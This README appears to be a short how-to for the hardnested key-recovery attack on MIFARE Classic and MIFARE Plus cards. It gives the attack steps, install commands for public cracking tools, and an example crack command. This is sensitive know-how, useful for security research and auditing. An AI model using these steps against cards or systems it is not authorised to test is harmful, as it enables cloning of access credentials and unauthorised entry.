└── README.md


/README.md:
--------------------------------------------------------------------------------
 1 | # Hardnested attack
 2 | 
 3 | ### Works on
 4 | New MiFare Classic and MiFare Plus without AES (Note that AES is disabled by default)
 5 | 
 6 | ### Attack
 7 | 
 8 | 1. Collect 2000-4000 nonces with a NFC card reader. The speed in collecting nonces depends on the reader.
 9 | 
10 | 2. Analyze the nonces generated in step 1 in order to reduce the key original space of 2^48
11 | 
12 | 3. Offline Brute Force
13 | 
14 | ### Software
15 | 
16 | Before using other methods, always try to use **mfoc** first, since it's the faster and easiest method, if the card is vulnerable to nested attack
17 | 
18 | ```bash
19 | $ git clone https://github.com/nfc-tools/mfoc
20 | $ cd mfoc
21 | $ autoreconf -vfi
22 | $ ./configure
23 | $ make
24 | $ sudo make install
25 | ```
26 | 
27 | If mfoc shows "Card is not vulnerable to nested attack", you have to use hardnested attack.
28 | You can do this with an automatic tool, or manually
29 | 
30 | #### Automatic method
31 | 
32 | ```bash
33 | # Installation
34 | $ git clone https://github.com/nfc-tools/miLazyCracker
35 | $ ./miLazyCrackerFreshInstall.sh
36 | 
37 | # Run with a usb NFC card reader connected
38 | $ miLazyCracker
39 | ```
40 | 
41 | #### Manual method
42 | 
43 | ```bash
44 | # Installation
45 | $ git clone https://github.com/aczid/crypto1_bs
46 | $ cd crypto1_bs
47 | $ make get_craptev1
48 | $ make get_crapto1
49 | $ make
50 | $ sudo make install
51 | 
52 | # Usage
53 | $ libnfc_crypto1_crack <known_key> <for_block> <A|B> <target_block> <A|B>
54 | 
55 | # Example
56 | # Note that we have to write the block, not the sector, so the 20th block is the last block of sector 5, and the 24th block is the last block of sector 6
57 | $ libnfc_crypto1_crack 0123456789ab 20 B 24 B
58 | 
59 | ```


--------------------------------------------------------------------------------